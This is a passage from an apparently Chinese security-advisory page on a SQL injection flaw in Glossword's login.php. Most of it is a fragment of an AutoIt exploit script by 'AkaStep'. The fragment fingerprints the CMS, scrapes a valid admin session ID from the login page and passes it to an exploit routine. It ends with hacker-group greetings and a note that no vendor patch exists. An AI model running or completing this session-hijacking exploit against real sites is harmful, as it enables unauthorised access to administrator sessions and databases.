Glossword 'login.php' SQL 注入漏洞(3)

Func  sendfakeretrivevalidsess($targetsite,$installdir)
 
$fakesessionID='';
 Do
 $fakesessionID&=Chr(Random(97,102,1)) & Random(0,9,1)
 until StringLen($fakesessionID)=32
 
$fakesessionID=StringMid($fakesessionID,Random(1,32,1),1) & StringMid($fakesessionID,1,StringLen($fakesessionID)-1)
 ConsoleWrite($triptrop & '[*] SENDING FAKE SESSUID: ' & $fakesessionID &  ' [*] ' &  $triptrop)
 sleep(Random(1000,2500,1))
 $rtarget=$targetsite & $installdir &"gw_admin/login.php?visualtheme=gw_admin&sid=" &$fakesessionID;
 HttpSetUserAgent($useragent);
 $str=_INetGetSource($rtarget);
 if StringInStr($str,"Session does not exist.") then
 ConsoleWrite($triptrop & '[*]' &  _StringRepeat(' ',18) & 'CMS is GLOSSWORD!  ' &  _StringRepeat(' ',19) & '[*]' & $triptrop);
 sleep(Random(1000,2500,1))
 Else
  ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',11) &'NOPE:( THIS IS NOT GLOSSWORD CMS.' &_StringRepeat(' ',12) &'[*]' & $triptrop);
 exit;
 EndIf
 $i=123
 $mystr='';
 ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',16) & 'FETCHING VALID SESSUID' & _StringRepeat(' ',17) & ' [*]' & $triptrop)
 sleep(Random(1000,2500,1))
 Do
 $i+=1;
 if $i>=4000 then ExitLoop;//Just for make sure we are not going to infinitive loop if there any error occurs.//
 $mystr&=StringMid($str,$i,1)
 until StringInStr($mystr,chr(34));
 

$sessid=StringMid($mystr,StringInStr($mystr,Chr(61))+1,32)
 if not $sessid =32 Then
  ConsoleWrite($triptrop & '[*] Sorry Man! Theris an error while fetching new VALID SESSUID  [*]' & $triptrop)
  exit;
 Else
  ConsoleWrite($triptrop & '[*]  Got VALID SESSUID: ' & $sessid &  '  [*]' & $triptrop)
 EndIf
 $targetsite=StringReplace(StringReplace($targetsite,'http://',''),'/','')
 exploit($targetsite,$installdir,$sessid)
 EndFunc;=>sendfakeretrivevalidsess();
 

#cs
 
================================================
            KUDOSSSSSSS
 ================================================
 packetstormsecurity.org
 packetstormsecurity.com
 packetstormsecurity.net
 securityfocus.com
 cxsecurity.com
 security.nnov.ru
 securtiyvulns.com
 securitylab.ru
 secunia.com
 securityhome.eu
 exploitsdownload.com
 osvdb.com
 websecurity.com.ua
 1337day.com
 itsecuritysolutions.org
 
to all Aa Team + to all Azerbaijan Black HatZ
 + *Especially to my bro CAMOUFL4G3 *
 To All Turkish Hackers
 
Also special thanks to: ottoman38 & HERO_AZE
 ================================================
 
/AkaStep
 

#ce

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
sourceforge
 -----------
 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：